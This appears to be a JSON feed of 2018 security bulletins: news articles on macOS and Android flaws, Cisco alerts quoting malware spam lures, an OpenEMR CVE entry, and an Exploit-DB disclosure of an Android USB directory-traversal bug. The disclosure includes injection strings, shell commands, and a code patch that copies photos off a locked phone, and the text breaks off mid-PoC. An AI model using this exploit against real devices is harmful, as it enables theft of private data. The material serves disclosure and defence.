warnings that ask users to choose between \"allow\" or \"deny\" and so access sensitive data or features. \n\n\n> \"The user interface is that single point of failure,\" says Wardle. \"If you have a way to synthetically interact with these alerts, you have a very powerful and generic way to bypass all these security mechanisms.\"\n\nAlthough Wardle has not yet published technical details of the flaw, he says the vulnerability can potentially be exploited to dump all passwords from the keychain or load malicious kernel extensions by virtually clicking \"allow\" on the security prompt and gain full control of a target machine. 
\n\n\n \nWardle said that he found this loophole accidentally when copying and pasting the code and that just two lines of code are enough to completely break this security mechanism. \n \nUnlike earlier findings, Wardle didn't report Apple about his latest research and choose to publicly reveal details of the zero-day bug at DefCon hacker conference. \n\n\n> \"Of course OS vendors such as Apple are keenly aware of this 'attack' vector, and thus strive to design their UI in a manner that is resistant against synthetic events. Unfortunately, they failed,\" says Wardle.\n\nHowever, the Apple's next version of macOS, Mojave, already has mitigated the threat by blocking all synthetic events, which eventually reduces the scope of accessibility features on applications that legitimately use this feature.\n", "reporter": "The Hacker News", "published": "2018-08-13T16:19:00", "type": "thn", "title": "ex-NSA Hacker Discloses macOS High Sierra Zero-Day Vulnerability", "enchantments": {"score": {"modified": "2018-08-14T05:12:46", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-08-14T05:11:06", "id": "THN:BC9593F75E3497CB8C0AE16E2358A327", "href": "https://thehackernews.com/2018/08/macos-mouse-click-hack.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-13T15:12:32", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[![android-hack](https://1.bp.blogspot.com/-QNbapp4TO4Q/W3GQx3-H8OI/AAAAAAAAx0w/x9jiwYoRv_gEQrZUlbL_rQnh-1yOqCBAACLcBGAs/s728-e100/android-hack.png)](<https://1.bp.blogspot.com/-QNbapp4TO4Q/W3GQx3-H8OI/AAAAAAAAx0w/x9jiwYoRv_gEQrZUlbL_rQnh-1yOqCBAACLcBGAs/s728-e100/android-hack.png>)\n\nBought a new Android phone? What if I say your brand new smartphone can be hacked remotely? 
\n \nNearly all Android phones come with useless applications pre-installed by manufacturers or carriers, usually called bloatware, and there's nothing you can do if any of them has a backdoor built-in\u2014even if you're careful about avoiding sketchy apps. \n \nThat's exactly what security researchers from mobile security firm Kryptowire demonstrated at the DEF CON security conference on Friday. \n\n\n \nResearchers [disclosed](<https://www.kryptowire.com/portal/android-firmware-defcon-2018/>) details of 47 different vulnerabilities deep inside the firmware and default apps (pre-installed and mostly non-removable) of 25 Android handsets that could allow hackers to spy on users and factory reset their devices, putting millions of Android devices at risk of hacking. \n \nAt least 11 of those vulnerable smartphones are manufactured by companies including Asus, ZTE, LG, and the Essential Phone, and being distributed by US carriers like Verizon and AT&amp;T. \n \nOther major Android handset brands include Vivo, Sony, Nokia, and Oppo, as well as many smaller manufacturers such as Sky, Leagoo, Plum, Orbic, MXQ, Doogee, Coolpad, and Alcatel. \n \nSome vulnerabilities discovered by researchers could even allow hackers to execute arbitrary commands as the system user, wipe all user data from a device, lock users out of their devices, access device's microphone and other functions, access all their data, including their emails and messages, read and modify text messages, sending text messages, and more\u2014all without the users' knowledge. \n\n\n> \"All of these are vulnerabilities that are prepositioned. They come as you get the phone out the box,\" Kryptowire CEO Angelos Stavrou said in a statement. 
\"That's important because consumers think they're only exposed if they download something that's bad.\"\n\nFor example, vulnerabilities in Asus ZenFone V Live could allow an entire system takeover, allowing attackers to take screenshots and record user\u2019s screen, make phone calls, spying on text messages, and more. \n\n\n \nKryptowire, whose research was funded by the U.S. Department of Homeland Security, explained that these vulnerabilities stem from the open nature of the Android's operating system that allows third-parties like device manufacturers and carriers to modify the code and create completely different versions of Android. \n \nKryptowire is the same security firm that, in late 2016, uncovered a [pre-installed backdoor](<https://thehackernews.com/2016/11/hacking-android-smartphone.html>) in more than 700 Million Android smartphones that surreptitiously found sending all text messages, call log, contact list, location history, and app data to China every 72 hours. \n \nKryptowire has responsibly reported the vulnerabilities to Google and the respective affected Android partners, some of which have patched the issues while others are working diligently and swiftly to address these issues with a patch. 
\n \nHowever, it should be noted that since the Android operating system itself is not vulnerable to any of the disclosed issues, Google can't do much about this, as it has no control over the third apps pre-installed by manufacturers and carriers.\n", "reporter": "The Hacker News", "published": "2018-08-13T14:13:00", "type": "thn", "title": "Flaws in Pre-Installed Apps Expose Millions of Android Devices to Hackers", "enchantments": {"score": {"modified": "2018-08-13T15:12:32", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-08-13T14:13:56", "id": "THN:34FA8F74B9C065A2BA51C4BAD9B6B900", "href": "https://thehackernews.com/2018/08/android-app-hack.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "ciscothreats": [{"lastseen": "2018-08-13T17:07:57", "_object_types": ["robots.models.cisco.CiscoThreatBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Medium\n\nAlert ID: \n\n58674\n\nFirst Published:\n\n2018 August 13 15:20 GMT\n\nVersion: \n\n1\n\n## \n\nSummary \n\n * Cisco Security has detected significant activity related to spam email messages distributing malicious software. \n \nEmail messages that are related to this threat (RuleID33305) may contain the following files: \n \n**Name** | **Size in Bytes** | **MD5 Checksum** \n---|---|--- \nTNT Consigment Details_pdf.gz / TNT Consigment Details_pdf.exe \n| 520,192 \n| 0xA1459FF62EBD3A60C7332EB19B3DE607 \n \n \n \nThe following text is a sample of the email message that is associated with this threat outbreak:\n\n> Subject: **TNT EXPRESS INTERNATIONAL COURIER DELIVERY UPDATE**\n\n> Message Body:\n\n> \n**Dear Customer: \nWe attach the consignment details issued today, and the link from which you can access the TNT Express web application where you will find detailed information \nabout your bill. \nhxxps: //express.tnt.com/tntexpress/LOGIN.ASPX . 
\nIf you have any questions related to the concepts of the bill, please contact your usual billing manager or number on the top left of your bill. For any \nquestions about the Web application, contact TNT Express.es. This service is legally valid electronic consignment, replacing paper clearance and is the preferred \nmethod of billing TNT, also for his involvement with environmental improvement. \nA cordial greeting, \nTNT Express \n\\-------------------------------------------------------------------- \nThis message and any attachment are confidential and may be privileged or otherwise protected from disclosure.If you are not the intended recipient, please \ntelephone or email the sender and delete this message and any attachment from your system. If you are not the intended recipient you must not copy this \nmessage or attachment or disclose the contents to any other person. Please consider the environmental impact before printing this document and its \nattachment(s). Print black and white and double-sided where possible.**\n\nCisco security appliances can help protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Cisco Web Security Appliances help secure and control web and email traffic by offering layers of malware protection. Cisco security appliances are automatically updated to help prevent both spam email and hostile web URLs from being passed to the end user.\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n1 | Initial release to report significant activity detected by Cisco Security on August 13, 2018. | \u2014 | 2018-August-13 \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. 
YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "reporter": "Cisco", "published": "2018-08-13T15:20:38", "type": "ciscothreats", "title": "Threat Outbreak Alert RuleID33305: Email Messages Distributing Malicious Software on August 13, 2018", "enchantments": {"score": {"modified": "2018-08-13T17:07:57", "vector": "NONE", "value": 5.0}}, "ciscoThreat": {"messageBody": "Dear Customer:\nWe attach the consignment details issued today, and the link from which you can access the TNT Express web application where you will find detailed information\nabout your bill.\nhxxps: //express.tnt.com/tntexpress/LOGIN.ASPX .\nIf you have any questions related to the concepts of the bill, please contact your usual billing manager or number on the top left of your bill. For any\nquestions about the Web application, contact TNT Express.es. This service is legally valid electronic consignment, replacing paper clearance and is the preferred\nmethod of billing TNT, also for his involvement with environmental improvement.\nA cordial greeting,\nTNT Express\n--------------------------------------------------------------------\nThis message and any attachment are confidential and may be privileged or otherwise protected from disclosure.If you are not the intended recipient, please\ntelephone or email the sender and delete this message and any attachment from your system. If you are not the intended recipient you must not copy this\nmessage or attachment or disclose the contents to any other person. Please consider the environmental impact before printing this document and its\nattachment(s). 
Print black and white and double-sided where possible.", "size": 520192, "subject": "TNT EXPRESS INTERNATIONAL COURIER DELIVERY UPDATE", "files": "TNT Consigment Details_pdf.gz / TNT Consigment Details_pdf.exe", "md5": "0xA1459FF62EBD3A60C7332EB19B3DE607"}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.cisco.CiscoThreatBulletin", "modified": "2018-08-13T15:20:38", "id": "CISCO-THREAT-58674", "href": "https://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=58674", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-13T17:07:57", "_object_types": ["robots.models.cisco.CiscoThreatBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Medium\n\nAlert ID: \n\n58663\n\nFirst Published:\n\n2018 August 13 12:39 GMT\n\nVersion: \n\n1\n\n## \n\nSummary \n\n * Cisco Security has detected significant activity related to spam email messages distributing malicious software. \n \nEmail messages that are related to this threat (RuleID33528) may contain the following files: \n \n**Name** | **Size in Bytes** | **MD5 Checksum** \n---|---|--- \nOriginal shipping docs..BL.jar \n| 517,947 \n| 0x0E0E26A24BA91969200D28E42CDD1EA6 \n \n \n \nThe following text is a sample of the email message that is associated with this threat outbreak:\n\n> Message Body:\n\n> \n**Dear Customer, \nAttached is the Original Shipping documents and BL as assigned to deliver to you. \nNotification for shipment event group \"Pick Up\" for 14th July, 2018. \nAWB Number: 1343355146 \nPickup Date: 2018-08-14 14:44:09 \nService: Express \nPieces: 2 \nCust. Ref: \nDescription: COMMERCIAL INVOICE, BILL OF LADING, ETC DOC \nRegards. \nThank you for shipping with DHL Express! \nDeutsche Post DHL - The Mail &amp; Logistics Group. \n2015 \u00a9 DHL International GmbH. All rights reserved. 
\nTerms &amp; Conditions | Privacy Statement \n\\----- End forwarded message ----- \n\\----- End forwarded message -----**\n\n \nCisco security appliances can help protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Cisco Web Security Appliances help secure and control web and email traffic by offering layers of malware protection. Cisco security appliances are automatically updated to help prevent both spam email and hostile web URLs from being passed to the end user.\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n1 | Initial release to report significant activity detected by Cisco Security on August 12, 2018. | \u2014 | 2018-August-13 \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. 
The information in this document is intended for end users of Cisco products \n", "reporter": "Cisco", "published": "2018-08-13T12:39:18", "type": "ciscothreats", "title": "Threat Outbreak Alert RuleID33528: Email Messages Distributing Malicious Software on August 12, 2018", "enchantments": {"score": {"modified": "2018-08-13T17:07:57", "vector": "NONE", "value": 5.0}}, "ciscoThreat": {"messageBody": "Dear Customer,\nAttached is the Original Shipping documents and BL as assigned to deliver to you.\nNotification for shipment event group \"Pick Up\" for 14th July, 2018.\nAWB Number: 1343355146\nPickup Date: 2018-08-14 14:44:09\nService: Express\nPieces: 2\nCust. Ref:\nDescription: COMMERCIAL INVOICE, BILL OF LADING, ETC DOC\nRegards.\nThank you for shipping with DHL Express!\nDeutsche Post DHL - The Mail & Logistics Group.\n2015 \u00a9 DHL International GmbH. All rights reserved.\nTerms & Conditions | Privacy Statement\n----- End forwarded message -----\n----- End forwarded message -----", "size": 517947, "subject": null, "files": "Original shipping docs..BL.jar", "md5": "0x0E0E26A24BA91969200D28E42CDD1EA6"}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.cisco.CiscoThreatBulletin", "modified": "2018-08-13T12:39:18", "id": "CISCO-THREAT-58663", "href": "https://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=58663", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-08-14T10:58:44", "references": ["https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/", "https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485"], "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.", "edition": 1, 
"reporter": "NVD", "published": "2018-08-13T14:29:00", "title": "CVE-2018-15139", "type": "cve", "enchantments": {"score": {"modified": "2018-08-14T10:58:44", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-15139"], "scanner": [], "modified": "2018-08-13T14:29:00", "cpe": [], "id": "CVE-2018-15139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15139", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-08-13T17:27:00", "osvdbidlist": [], "references": [], "description": "Android - Directory Traversal over USB via Injection in blkid Output. CVE-2018-9445. Local exploit for Android platform. Tags: Local, Traversal", "edition": 1, "reporter": "Exploit-DB", "published": "2018-08-13T00:00:00", "title": "Android - Directory Traversal over USB via Injection in blkid Output", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-08-13T17:27:00", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9445"], "modified": "2018-08-13T00:00:00", "id": "EDB-ID:45192", "href": "https://www.exploit-db.com/exploits/45192/", "sourceData": "When a USB mass storage device is inserted into an Android phone (even if the\r\nphone is locked!), vold will attempt to automatically mount partitions from the\r\ninserted device. For this purpose, vold has to identify the partitions on the\r\nconnected device and collect some information about them, which is done in\r\nreadMetadata() in system/vold/Utils.cpp. 
This function calls out to \"blkid\",\r\nthen attempts to parse the results:\r\n\r\n\r\n std::vector<std::string> cmd;\r\n cmd.push_back(kBlkidPath);\r\n cmd.push_back(\"-c\");\r\n cmd.push_back(\"/dev/null\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"TYPE\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"UUID\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"LABEL\");\r\n cmd.push_back(path);\r\n\r\n std::vector<std::string> output;\r\n status_t res = ForkExecvp(cmd, output, untrusted ? sBlkidUntrustedContext : sBlkidContext);\r\n if (res != OK) {\r\n LOG(WARNING) << \"blkid failed to identify \" << path;\r\n return res;\r\n }\r\n\r\n char value[128];\r\n for (const auto& line : output) {\r\n // Extract values from blkid output, if defined\r\n const char* cline = line.c_str();\r\n const char* start = strstr(cline, \"TYPE=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsType = value;\r\n }\r\n\r\n start = strstr(cline, \"UUID=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsUuid = value;\r\n }\r\n\r\n start = strstr(cline, \"LABEL=\");\r\n if (start != nullptr && sscanf(start + 6, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsLabel = value;\r\n }\r\n }\r\n\r\n\r\nNormally, the UUID string can't contain any special characters because blkid\r\ngenerates it by reformatting a binary ID as a printable UUID string. 
However,\r\nthe version of blkid that Android is using will print the LABEL first, without\r\nescaping the characters this code scans for, allowing an attacker to place\r\nspecial characters in the fsUuid variable.\r\n\r\n\r\nFor example, if you format a USB stick with a single partition, then place a\r\nromfs filesystem in the partition as follows (on the terminal of a Linux PC):\r\n\r\n # echo '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"' > /dev/sdc1\r\n\r\nand then connect the USB stick to a Nexus 5X and run blkid as root on the\r\ndevice, you'll see the injection:\r\n\r\n bullhead:/ # blkid -c /dev/null -s TYPE -s UUID -s LABEL /dev/block/sda1\r\n /dev/block/sda1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\"\r\n\r\n\r\nlogcat shows that the injection was successful and the device is indeed using\r\nthe injected values, but vold doesn't end up doing much with the fake UUID\r\nbecause fsck_msdos fails:\r\n\r\n05-29 20:41:26.262 391 398 V vold : /dev/block/vold/public:8,1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\" \r\n05-29 20:41:26.262 391 398 V vold : \r\n05-29 20:41:26.263 391 398 V vold : /system/bin/fsck_msdos\r\n05-29 20:41:26.263 391 398 V vold : -p\r\n05-29 20:41:26.263 391 398 V vold : -f\r\n05-29 20:41:26.263 391 398 V vold : /dev/block/vold/public:8,1\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {652 public:8,1 vfat}\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {653 public:8,1 ../../data}\r\n05-29 20:41:26.265 813 2039 D VoldConnector: RCV <- {654 public:8,1 TYPE=}\r\n05-29 20:41:26.281 391 398 I fsck_msdos: ** /dev/block/vold/public:8,1\r\n05-29 20:41:26.285 391 398 I fsck_msdos: Invalid sector size: 8995\r\n05-29 20:41:26.286 391 398 I fsck_msdos: fsck_msdos terminated by exit(8)\r\n05-29 20:41:26.286 391 398 E Vold : Filesystem check failed (no filesystem)\r\n05-29 20:41:26.286 391 398 E vold : public:8,1 failed filesystem check\r\n05-29 20:41:26.286 813 2039 D VoldConnector: RCV <- {651 
public:8,1 6}\r\n05-29 20:41:26.287 813 2039 D VoldConnector: RCV <- {400 48 Command failed}\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,1}:\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: type=PUBLIC diskId=disk:8,0 partGuid=null mountFlags=0 mountUserId=0 \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: state=UNMOUNTABLE \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: path=null internalPath=null \r\n\r\n\r\nFor a relatively harmless example in which vold actually ends up mounting the\r\ndevice in the wrong place, you can create a vfat partition with label\r\n'UUID=\"../##':\r\n\r\n # mkfs.vfat -n 'PLACEHOLDER' /dev/sdc1\r\n mkfs.fat 4.1 (2017-01-24)\r\n # dd if=/dev/sdc1 bs=1M count=200 | sed 's|PLACEHOLDER|UUID=\"../##|g' | dd of=/dev/sdc1 bs=1M\r\n 200+0 records in\r\n 200+0 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 1.28705 s, 163 MB/s\r\n 198+279 records in\r\n 198+279 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 2.60181 s, 80.6 MB/s\r\n\r\nConnect it to the Android device again while running strace against vold:\r\n\r\n [pid 398] newfstatat(AT_FDCWD, \"/mnt/media_rw/../##\", 0x7d935fe708, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchmodat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchownat(AT_FDCWD, \"/mnt/media_rw/../##\", 0, 0, 0) = 0\r\n [pid 398] mount(\"/dev/block/vold/public:8,1\", \"/mnt/media_rw/../##\", \"vfat\", MS_NOSUID|MS_NODEV|MS_NOEXEC|MS_DIRSYNC|MS_NOATIME, \"utf8,uid=1023,gid=1023,fmask=7,d\"...) 
= 0\r\n [pid 398] faccessat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", F_OK) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", 0755) = 0\r\n\r\nCheck the results:\r\n\r\n bullhead:/ # ls -l /mnt\r\n total 32\r\n drwxrwx--- 3 media_rw media_rw 32768 2018-05-29 20:54 ##\r\n drwx--x--x 2 root root 40 1970-01-01 04:14 appfuse\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 asec\r\n drwxrwx--x 2 system system 40 1970-01-01 04:14 expand\r\n drwxr-x--- 2 root media_rw 40 1970-01-01 04:14 media_rw\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 obb\r\n drwx------ 5 root root 100 1970-01-01 04:14 runtime\r\n lrwxrwxrwx 1 root root 21 1970-01-01 04:14 sdcard -> /storage/self/primary\r\n drwx------ 3 root root 60 1970-01-01 04:14 secure\r\n drwxr-xr-x 3 root root 60 1970-01-01 04:14 user\r\n bullhead:/ # mount | grep '##'\r\n /dev/block/vold/public:8,1 on /mnt/## type vfat (rw,dirsync,nosuid,nodev,noexec,noatime,uid=1023,gid=1023,fmask=0007,dmask=0007,allow_utime=0020,codepage=437,iocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro)\r\n\r\n\r\nWhen testing with a normal USB stick, the attacker has to choose between using a\r\nvfat filesystem (so that Android is capable of mounting it as external storage)\r\nand using a romfs filesystem (so that the label is long enough to specify\r\narbitrary paths). However, an attacker who wants to perform more harmful attacks\r\ncould use a malicious USB storage device that is capable of delivering different\r\ndata for multiple reads from the same location. This way, it would be possible\r\nto deliver a romfs superblock when blkfs is reading, but deliver a vfat\r\nsuperblock when the kernel is reading. I haven't tested this yet because I don't\r\nyet have the necessary hardware.\r\n\r\n\r\nWhen you fix this issue, please don't just fix the injection and/or the\r\ndirectory traversal. 
I believe that from a security perspective, a smartphone\r\nshould not mount storage devices that are inserted while the screen is locked\r\n(or, more generally, communication with new USB devices should be limited while\r\nthe screen is locked). Mounting a USB storage device exposes a lot of code to\r\nthe connected device, including partition table parsing, vold logic, blkid, the\r\nkernel's FAT filesystem implementation, and anything on the device that might\r\ndecide to read files from the connected storage device.\r\n\r\n\r\n############################################################\r\n\r\nThis is a PoC for stealing photos from the DCIM folder of a Pixel 2 running\r\nbuild OPM2.171026.006.C1 while the device is locked. You will need a Pixel 2 as\r\nvictim device, a corresponding AOSP build tree, a Raspberry Pi Zero W (or some\r\nother device you can use for device mode USB), a powered USB hub, and some\r\ncables.\r\n\r\nThe victim phone must be powered on, the disk encryption keys must be unlocked\r\n(meaning that you must have entered your PIN/passphrase at least once since\r\nboot), and the attack probably won't work if someone has recently (since the\r\nlast reboot) inserted a USB stick into the phone.\r\n\r\n\r\nConfigure the Raspberry Pi Zero W such that it is usable for gadget mode\r\n(see e.g. 
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41).\r\n\r\nApply the following patch to frameworks/base in your AOSP build tree:\r\n\r\n=========================================\r\ndiff --git a/packages/ExternalStorageProvider./src/com/android/externalstorage/MountReceiver.java b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\nindex 8a6c7d68525..73be5818da1 100644\r\n--- a/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n+++ b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n@@ -20,10 +20,38 @@ import android.content.BroadcastReceiver;\r\n import android.content.ContentProviderClient;\r\n import android.content.Context;\r\n import android.content.Intent;\r\n+import java.io.File;\r\n+import java.io.FileInputStream;\r\n+import java.io.FileOutputStream;\r\n \r\n public class MountReceiver extends BroadcastReceiver {\r\n @Override\r\n public void onReceive(Context context, Intent intent) {\r\n+ System.logE(\"MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\");\r\n+ try {\r\n+ File exfiltration_dir = new File(\"/data/exfiltrated-photos\");\r\n+ exfiltration_dir.mkdir();\r\n+ File camera_dir = new File(\"/storage/emulated/0/DCIM/Camera\");\r\n+ File[] camera_files = camera_dir.listFiles();\r\n+ for (File camera_file: camera_files) {\r\n+ System.logE(\"GRABBING '\"+camera_file.getName()+\"'\");\r\n+ File exfiltrated_file = new File(exfiltration_dir, camera_file.getName());\r\n+ exfiltrated_file.delete();\r\n+ FileInputStream ins = new FileInputStream(camera_file);\r\n+ FileOutputStream outs = new FileOutputStream(exfiltrated_file);\r\n+ byte[] buf = new byte[4096];\r\n+ int len;\r\n+ while ((len=ins.read(buf)) > 0) {\r\n+ outs.write(buf, 0, len);\r\n+ }\r\n+ ins.close();\r\n+ outs.close();\r\n+ }\r\n+ } catch (Exception e) {\r\n+ throw new RuntimeException(e);\r\n+ }\r\n+ System.logE(\"INJECTED CODE DONE\");\r\n+\r\n final ContentProviderClient client = 
context.getContentResolver()\r\n .acquireContentProviderClient(ExternalStorageProvider.AUTHORITY);\r\n try {\r\n=========================================\r\n\r\nThen build the tree (\"lunch aosp_walleye-userdebug\", then build with \"make\").\r\n\r\nZip the classes.dex build artifact of ExternalStorageProvider:\r\n\r\n$ zip -jX zipped_dexfile ~/aosp-walleye/out/target/common/obj/APPS/ExternalStorageProvider_intermediates/classes.dex\r\n adding: classes.dex (deflated 49%)\r\n$ mv zipped_dexfile.zip zipped_dexfile\r\n\r\nDownload the factory image for OPM2.171026.006.C1 and unpack its system partition, e.g. using commands roughly as follows:\r\n\r\n$ unzip image-walleye-opm2.171026.006.c1.zip\r\n$ ~/aosp-walleye/out/host/linux-x86/bin/simg2img system.img system.img.raw # convert sparse image to normal\r\n$ echo 'rdump / walleye-opm2.171026.006.c1/unpacked_system/' | debugfs -f- walleye-opm2.171026.006.c1/unpacked_image/system.img.raw 2>/dev/null # extract filesystem image\r\n\r\nNow build the classes.dex build artifact into an odex file and a vdex file, linking against boot.art from the factory image:\r\n\r\n$ ~/aosp-walleye/out/host/linux-x86/bin/dex2oat --runtime-arg -Xms64m --runtime-arg -Xmx512m --class-loader-context='&' --boot-image=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/framework/boot.art --dex-file=zipped_dexfile --dex-location=/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk --oat-file=package.odex --android-root=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system --instruction-set=arm64 --instruction-set-variant=cortex-a73 --instruction-set-features=default --runtime-arg -Xnorelocate --compile-pic --no-generate-debug-info --generate-build-id --abort-on-hard-verifier-error --force-determinism --no-inline-from=core-oj.jar --compiler-filter=quicken\r\n\r\nThe resulting vdex file would not be accepted by the phone because of a CRC32\r\nchecksum mismatch; to fix it up, compile the 
attached vdex_crc32_fixup.c and use\r\nit to overwrite the CRC32 checksum with the expected one from the factory image:\r\n\r\n$ ./vdex_crc32_fixup package.vdex ~/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk \r\noriginal crc32: d0473780\r\nnew crc32: 84c10ae9\r\nvdex patched\r\n\r\nPrepare two disk images, each with a MBR partition table and a single partition.\r\nTheir partition tables should be identical.\r\nIn the first image's partition, place a fake romfs filesystem that triggers the\r\nvold bug:\r\n\r\n# echo -e '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"\\0' > /dev/sdd1\r\n\r\nFormat the second image's partition with FAT32, and create the following\r\ndirectory structure inside that filesystem (the \"system@\" entries are files, the\r\nrest are directories):\r\n\r\n\u251c\u2500\u2500 dalvik-cache\r\n\u2502 \u2514\u2500\u2500 arm64\r\n\u2502 \u251c\u2500\u2500 system@framework@boot.art\r\n\u2502 \u251c\u2500\u2500 system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex\r\n\u2502 \u2514\u2500\u2500 system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex\r\n\u251c\u2500\u2500 LOST.DIR\r\n\u251c\u2500\u2500 misc\r\n\u2502 \u2514\u2500\u2500 profiles\r\n\u2502 \u2514\u2500\u2500 cur\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u251c\u2500\u2500 user\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u2502 \u2514\u2500\u2500 cache\r\n\u2514\u2500\u2500 user_de\r\n \u2514\u2500\u2500 0\r\n \u2514\u2500\u2500 com.android.externalstorage\r\n \u2514\u2500\u2500 code_cache\r\n\r\nThe three system@ files should have the following contents:\r\n\r\n - system@framework@boot.art should be a copy of system/framework/arm64/boot.art\r\n from the system image.\r\n - system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex\r\n should 
